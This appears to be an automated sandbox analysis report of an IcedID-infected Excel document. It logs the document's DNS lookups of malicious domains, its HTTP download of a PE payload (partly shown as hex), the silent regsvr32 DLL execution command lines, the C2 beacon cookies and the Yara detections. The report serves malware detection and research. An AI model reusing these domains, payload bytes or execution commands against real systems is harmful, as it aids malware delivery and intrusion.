Jul 6, 2021 17:02:25.828780890 CEST | 49171 | 80 | 192.168.2.22 | 172.67.213.115
Jul 6, 2021 17:02:28.563040018 CEST | 49170 | 443 | 192.168.2.22 | 13.224.92.73
Jul 6, 2021 17:02:28.563436985 CEST | 49171 | 80 | 192.168.2.22 | 172.67.213.115
Jul 6, 2021 17:04:21.874082088 CEST | 49169 | 80 | 192.168.2.22 | 172.67.146.88
Jul 6, 2021 17:04:21.874717951 CEST | 49168 | 80 | 192.168.2.22 | 172.67.194.117
Jul 6, 2021 17:04:21.875232935 CEST | 49167 | 80 | 192.168.2.22 | 172.67.198.51
Jul 6, 2021 17:04:21.916270971 CEST | 80 | 49169 | 172.67.146.88 | 192.168.2.22
Jul 6, 2021 17:04:21.916296959 CEST | 80 | 49167 | 172.67.198.51 | 192.168.2.22
Jul 6, 2021 17:04:21.916306973 CEST | 80 | 49168 | 172.67.194.117 | 192.168.2.22
Jul 6, 2021 17:04:21.916524887 CEST | 49169 | 80 | 192.168.2.22 | 172.67.146.88
Jul 6, 2021 17:04:21.916677952 CEST | 49167 | 80 | 192.168.2.22 | 172.67.198.51
Jul 6, 2021 17:04:21.916688919 CEST | 49168 | 80 | 192.168.2.22 | 172.67.194.117

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 6, 2021 17:02:21.916457891 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:21.975888968 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:02:22.099387884 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:22.160144091 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:02:22.341444969 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:22.403510094 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:02:23.442266941 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:23.517529011 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:02:23.554577112 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:23.611675978 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:02:25.091429949 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:25.159929037 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jul 6, 2021 17:02:25.172430038 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jul 6, 2021 17:02:25.260128975 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 6, 2021 17:02:21.916457891 CEST | 192.168.2.22 | 8.8.8.8 | 0xa4ce | Standard query (0) | thousandsyears.download | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:22.099387884 CEST | 192.168.2.22 | 8.8.8.8 | 0xd36b | Standard query (0) | voopeople.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:22.341444969 CEST | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | uppercilio.fun | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:23.442266941 CEST | 192.168.2.22 | 8.8.8.8 | 0xb2dd | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:23.554577112 CEST | 192.168.2.22 | 8.8.8.8 | 0xaa88 | Standard query (0) | aws.amazon.com | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:25.091429949 CEST | 192.168.2.22 | 8.8.8.8 | 0x6848 | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:25.172430038 CEST | 192.168.2.22 | 8.8.8.8 | 0x26ae | Standard query (0) | astrocycle.download | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 6, 2021 17:02:21.975888968 CEST | 8.8.8.8 | 192.168.2.22 | 0xa4ce | No error (0) | thousandsyears.download | | 172.67.198.51 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:21.975888968 CEST | 8.8.8.8 | 192.168.2.22 | 0xa4ce | No error (0) | thousandsyears.download | | 104.21.52.111 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:22.160144091 CEST | 8.8.8.8 | 192.168.2.22 | 0xd36b | No error (0) | voopeople.fun | | 172.67.194.117 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:22.160144091 CEST | 8.8.8.8 | 192.168.2.22 | 0xd36b | No error (0) | voopeople.fun | | 104.21.12.122 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:22.403510094 CEST | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | uppercilio.fun | | 172.67.146.88 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:22.403510094 CEST | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | uppercilio.fun | | 104.21.55.83 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:23.517529011 CEST | 8.8.8.8 | 192.168.2.22 | 0xb2dd | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:02:23.517529011 CEST | 8.8.8.8 | 192.168.2.22 | 0xb2dd | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:02:23.517529011 CEST | 8.8.8.8 | 192.168.2.22 | 0xb2dd | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:23.611675978 CEST | 8.8.8.8 | 192.168.2.22 | 0xaa88 | No error (0) | aws.amazon.com | tp.8e49140c2-frontier.amazon.com | | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:02:23.611675978 CEST | 8.8.8.8 | 192.168.2.22 | 0xaa88 | No error (0) | tp.8e49140c2-frontier.amazon.com | dr49lng3n1n2s.cloudfront.net | | CNAME (Canonical name) | IN (0x0001)
Jul 6, 2021 17:02:23.611675978 CEST | 8.8.8.8 | 192.168.2.22 | 0xaa88 | No error (0) | dr49lng3n1n2s.cloudfront.net | | 13.224.92.73 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:25.159929037 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:25.159929037 CEST | 8.8.8.8 | 192.168.2.22 | 0x6848 | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:25.260128975 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | astrocycle.download | | 104.21.37.209 | A (IP address) | IN (0x0001)
Jul 6, 2021 17:02:25.260128975 CEST | 8.8.8.8 | 192.168.2.22 | 0x26ae | No error (0) | astrocycle.download | | 172.67.213.115 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• thousandsyears.download
• voopeople.fun
• uppercilio.fun
• astrocycle.download

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 172.67.198.51 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:02:22.024257898 CEST | 0 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: thousandsyears.download
    Connection: Keep-Alive
Jul 6, 2021 17:02:22.076168060 CEST | 1 | IN | HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 15:02:22 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 3951
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=X1YFOhsI9n7GWXlJ02lzXREE47WwqUs%2FEJigtm6a2EmmocA%2FA9G2SS79lLQgFkP2nH1zXviNXTW4ttMMEI7us%2F9DSsd6KYDbe6KKrj2q3kKKUwI1jBEMRAZnzlQTBKz51jLe9%2B0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a9b6b3dc2b4e3d-FRA
    Content-Encoding: gzip
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
    Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
    Data Ascii: 14
Jul 6, 2021 17:02:22.076194048 CEST | 1 | IN | Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49168 | 172.67.194.117 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:02:22.208049059 CEST | 2 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: voopeople.fun
    Connection: Keep-Alive
Jul 6, 2021 17:02:22.280752897 CEST | 3 | IN | HTTP/1.1 200 OK
    Date: Tue, 06 Jul 2021 15:02:22 GMT
    Content-Type: application/octet-stream
    Content-Length: 57856
    Connection: keep-alive
    Content-Disposition: attachment; filename=lsdfik.fml
    Cache-Control: max-age=14400
    CF-Cache-Status: HIT
    Age: 3950
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=2tFpU8aAbVHKc8qaWG5vA44M%2FvQQDR%2FHMrJKYE2U8pvpTAJBVZB1EwE1r%2BdCJ9kIPXR9eZUJcp4sTKGEmTFWIbmcSnYHw3hmyr%2B4FkYtjbFf%2B2GBpgB79iIn9w%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 66a9b6b50e8b2c22-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 09 8f f1 c7 4d ee 9f 94 4d ee 9f 94 4d ee 9f 94 3e 8c 9e 95 4e ee 9f 94 4d ee 9e 94 4b ee 9f 94 4d ee 9f 94 49 ee 9f 94 e8 87 9f 95 4c ee 9f 94 e8 87 9d 95 4c ee 9f 94 52 69 63 68 4d ee 9f 94 00 00 00 00 00 00 00 00 50 45 00 00 64 86 04 00 86 06 e4 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 00 00 00 3a 00 00 00 a4 00 00 00 00 00 00 20 13 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 10 01 00 00 04 00 00 f8 ba 01 00 01 00 60 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 a0 ec 00 00 fc 00 00 00 9c ed 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7e 9e 00 00 00 50 00 00 00 a0 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 00 00 00 00 f0 00 00 00 02 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 
74 61 00 00 cc 00 00 00 00 00 01 00 00 02
                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@.text(8: `.rdata~P>@@.data`@.pdata
Jul 6, 2021 17:02:22.280826092 CEST | 5 | IN | Data Raw: 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Data Ascii: @@
Jul 6, 2021 17:02:22.280878067 CEST | 6 | IN | Data Raw: 00 c7 84 24 a4 00 00 00 23 02 00 00 8b 05 5a dc 00 00 89 44 24 4c c7 84 24 ac 00 00 00 0b 00 00 00 8b 05 49 dc 00 00 35 89 b4 5a f6 89 05 3e dc 00 00 c7 84 24 a8 00 00 00 17 00 00 00 48 8b 15 78 dc 00 00 8b 05 22 dc 00 00 41 89 c0 48 89 54 24 20
Data Ascii: $#ZD$L$I5Z>$Hx"AHT$ LA0ALT$ AH<<H$HL$@$G$G$GHHD$0$GD$/$GHD$@L$?${HD$@HHD
Jul 6, 2021 17:02:22.280934095 CEST | 8 | IN | Data Raw: 8b 8c 24 a8 00 00 00 48 8b 49 18 48 89 8c 24 a8 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 8c 01 00 00 48 8b 8c 24 a8 00 00 00 48 8b 49 20 48 89 4c 24 70 0f b7 84 24 b2 00 00 00 89 84 24 88 01 00 00 48 83 7c 24 70 00 0f 84 dc 06 00 00 0f b7 84 24
Data Ascii: $HIH$$$H$HI HL$p$$H|$p$$HL$pHIPHL$h$$HL$pfQHf$$$|HD$`$$xD$/$tHT$`$p$pALD$`D$/$lLD$h
Jul 6, 2021 17:02:22.281004906 CEST | 9 | IN | Data Raw: 00 89 84 24 f8 00 00 00 8b 44 24 34 83 c8 02 89 44 24 34 c7 84 24 f4 00 00 00 89 b4 5a f6 e9 e5 00 00 00 8b 84 24 84 00 00 00 8b 4c 24 44 81 f1 89 b4 5a f6 39 c8 0f 85 57 00 00 00 0f b7 84 24 b2 00 00 00 89 84 24 f0 00 00 00 48 8b 8c 24 a8 00 00
Data Ascii: $D$4D$4$Z$L$DZ9W$$H$H$HH$$D$4D$4$Zp$L$@Z9R$$H$H$HHw$$D$4D$4
Jul 6, 2021 17:02:22.281049013 CEST | 10 | IN | Data Raw: 48 8b b4 24 a0 00 00 00 48 89 b4 24 60 03 00 00 48 8b b4 24 60 03 00 00 89 b4 24 6c 03 00 00 c7 84 24 84 00 00 00 00 00 00 00 8b 84 24 84 00 00 00 3b 84 24 80 00 00 00 0f 83 c4 00 00 00 48 8b 84 24 a0 00 00 00 48 89 84 24 50 03 00 00 48 8b 84 24
Data Ascii: H$H$`H$`$l$$;$H$H$PH$P$\HL$pHL$xH$H$@H$@$LLD$xILD$xL$L$0L$0D$<LL$pILL$pL$L$ L$ D$,$
Jul 6, 2021 17:02:22.281089067 CEST | 12 | IN | Data Raw: 00 00 4c 8b 84 24 a8 00 00 00 41 8b 48 28 41 89 c8 4c 01 c2 48 89 54 24 50 48 8b 54 24 50 48 89 94 24 d0 01 00 00 48 8b 94 24 d0 01 00 00 89 94 24 dc 01 00 00 48 83 7c 24 50 00 0f 84 27 00 00 00 48 8b 44 24 50 48 8b 8c 24 a0 00 00 00 48 8b 15 47
Data Ascii: L$AH(ALHT$PHT$PH$H$$H|$P'HD$PH$HGL$(HDD$(E1H$H$TE1DHD$@HD$@H$H$$H;L$@qH$H$H$$HL$@DLHLH
Jul 6, 2021 17:02:22.281120062 CEST | 13 | IN | Data Raw: 84 24 44 01 00 00 48 8b 4c 24 38 0f b7 41 16 83 e0 01 83 f8 00 0f 84 31 00 00 00 8b 44 24 60 89 84 24 40 01 00 00 c6 44 24 67 00 48 8b 4c 24 68 48 89 8c 24 30 01 00 00 48 8b 8c 24 30 01 00 00 89 8c 24 3c 01 00 00 e9 3d 00 00 00 48 8b 44 24 68 48
Data Ascii: $DHL$8A1D$`$@D$gHL$hH$0H$0$<=HD$hH$ H$ $,D$gHL$hH$H$$D$`$HD$hH$H$$|$`MD$`$HL$@AD$TD$T$D$TT$`)T$`D$
Jul 6, 2021 17:02:22.281160116 CEST | 15 | IN | Data Raw: 50 48 89 84 24 70 01 00 00 48 8b 84 24 70 01 00 00 89 84 24 7c 01 00 00 48 8b 4c 24 68 8b 01 89 c1 48 03 8c 24 88 00 00 00 48 89 4c 24 58 48 8b 4c 24 58 48 89 8c 24 60 01 00 00 48 8b 8c 24 60 01 00 00 89 8c 24 6c 01 00 00 48 8b 54 24 68 8b 42 10
Data Ascii: PH$pH$p$|HL$hH$HL$XHL$XH$`H$`$lHT$hBH$HT$@HT$@H$PH$P$\hH$$LHL$hAH$HL$XHL$XH$@H$@$HHT$XHT$@HT$@H$0H$0$<H$
Jul 6, 2021 17:02:22.281208038 CEST | 16 | IN | Data Raw: 8b 04 91 44 89 c1 48 01 c8 48 89 44 24 30 48 8b 44 24 30 48 89 84 24 80 00 00 00 e9 70 00 00 00 48 8b 44 24 68 48 89 84 24 b8 00 00 00 48 8b 84 24 b8 00 00 00 89 84 24 c4 00 00 00 8b 44 24 4c 83 c0 01 89 44 24 4c e9 93 fe ff ff 48 8b 44 24 68 48
Data Ascii: DHHD$0HD$0H$pHD$hH$H$$D$LD$LHD$hH$H$$HD$hH$H$$H$H$HH$LL$`DD$\T$[HL$PD$<HL$PHL$pHL$pL$|HL$PD$+HD
Jul 6, 2021 17:02:22.281810999 CEST | 18 | IN | Data Raw: 24 a0 00 00 00 48 8b 8c 24 a0 00 00 00 89 8c 24 ac 00 00 00 e9 63 ff ff ff 48 8b 44 24 30 48 89 84 24 90 00 00 00 48 8b 84 24 90 00 00 00 89 84 24 9c 00 00 00 48 8b 44 24 50 48 89 84 24 80 00 00 00 48 8b 84 24 80 00 00 00 89 84 24 8c 00 00 00 48
Data Ascii: $H$$cHD$0H$H$$HD$PH$H$$HD$hHD$hHHHT$HL$HD$HD$ HD$ D$,HL$H$H$$HD$H$H$$HL$HHHT$D$HL$H$H


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49169 | 172.67.146.88 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:02:22.447182894 CEST | 65 | OUT | GET /div/44376,8555986111.jpg HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: uppercilio.fun
Connection: Keep-Alive
Jul 6, 2021 17:02:22.579262018 CEST | 66 | IN | HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 15:02:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 3950
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zPrLaRFWCe%2FVw6Uhi9sg5%2FGjaYrSaqdrM%2FOtgQ3239%2Fs47JD0%2B9tCMX8ZmQEvu37t5sFQlzbzOaP0%2B51gCvVAfMrti8AAWYfC1EUCZlvpi8At7lfKHJpIRy7hrE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9b6b6ab5f16ea-FRA
Content-Encoding: gzip
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 03 00 00 00 00 00 00 00 00 00 0d 0a
Data Ascii: 14
Jul 6, 2021 17:02:22.579315901 CEST | 66 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.22 | 49171 | 172.67.213.115 | 80 | C:\Windows\System32\regsvr32.exe

Timestamp | kBytes transferred | Direction | Data
Jul 6, 2021 17:02:25.300074100 CEST | 325 | OUT | GET / HTTP/1.1
Connection: Keep-Alive
Cookie: __gads=3565085024:1:7007:51; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=343732383437:416C627573:32323430323331394544383343383535; __io=0; _gid=67AFEDC5AC03
Host: astrocycle.download
Jul 6, 2021 17:02:25.828568935 CEST | 326 | IN | HTTP/1.1 404 Not Found
Date: Tue, 06 Jul 2021 15:02:25 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=d3szPdyTRg6bzD7Bq5SxAVq2%2FmuLykBb6CLjyhuLYziN788WdmOD6V%2BCF4ofbolE28MKKdSEx2vLiJFErQQl8xkCs1l6sttDcKgOkPu97qCFks8YeLBPfnXv54E%2BO4UxsQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 66a9b6c84ca94a61-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
Jul 6, 2021 17:02:25.828596115 CEST | 326 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
Jul 6, 2021 17:02:23.707760096 CEST | 13.224.92.73 | 443 | 192.168.2.22 | 49170 | 769,49172-49171-57-51-53-47-49162-49161-56-50-10-19-5-4,0-10-11-23-65281,23-24,0 | 05af1f5ca1b87cc9cc9b25185115607d

Certificate chain presented by the server (leaf first):

Subject | Issuer | Not Before | Not After
CN=aws.amazon.com | CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | Wed Sep 30 02:00:00 CEST 2020 | Thu Sep 23 14:00:00 CEST 2021
CN=Amazon, OU=Server CA 1B, O=Amazon, C=US | CN=Amazon Root CA 1, O=Amazon, C=US | Thu Oct 22 02:00:00 CEST 2015 | Sun Oct 19 02:00:00 CEST 2025
CN=Amazon Root CA 1, O=Amazon, C=US | CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | Mon May 25 14:00:00 CEST 2015 | Thu Dec 31 02:00:00 CET 2037
CN=Starfield Services Root Certificate Authority - G2, O="Starfield Technologies, Inc.", L=Scottsdale, ST=Arizona, C=US | OU=Starfield Class 2 Certification Authority, O="Starfield Technologies, Inc.", C=US | Wed Sep 02 02:00:00 CEST 2009 | Wed Jun 28 19:39:16 CEST 2034

Code Manipulations

Statistics

CPU Usage


Memory Usage


High Level Behavior Distribution


Behavior

                                                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                                                System Behavior

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:39
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                                                                                Imagebase:0x13ff40000
                                                                                                                                                                                                                                File size:27641504 bytes
                                                                                                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:41
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XRAY.dll
                                                                                                                                                                                                                                Imagebase:0xff7d0000
                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:41
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:regsvr32 -silent ..\XTOWN.dll
                                                                                                                                                                                                                                Imagebase:0xff7d0000
                                                                                                                                                                                                                                File size:19456 bytes
                                                                                                                                                                                                                                MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2098223236.0000000002780000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: MAL_IcedID_GZIP_LDR_202104, Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads, Source: 00000004.00000002.2096122245.00000000000A0000.00000004.00000001.sdmp, Author: Thomas Barabosch, Telekom Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_IcedID_1, Description: Yara detected IcedID, Source: 00000004.00000002.2096415724.000000000032D000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:high

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Start time:17:02:45
                                                                                                                                                                                                                                Start date:06/07/2021
                                                                                                                                                                                                                                Path:C:\Windows\System32\regsvr32.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
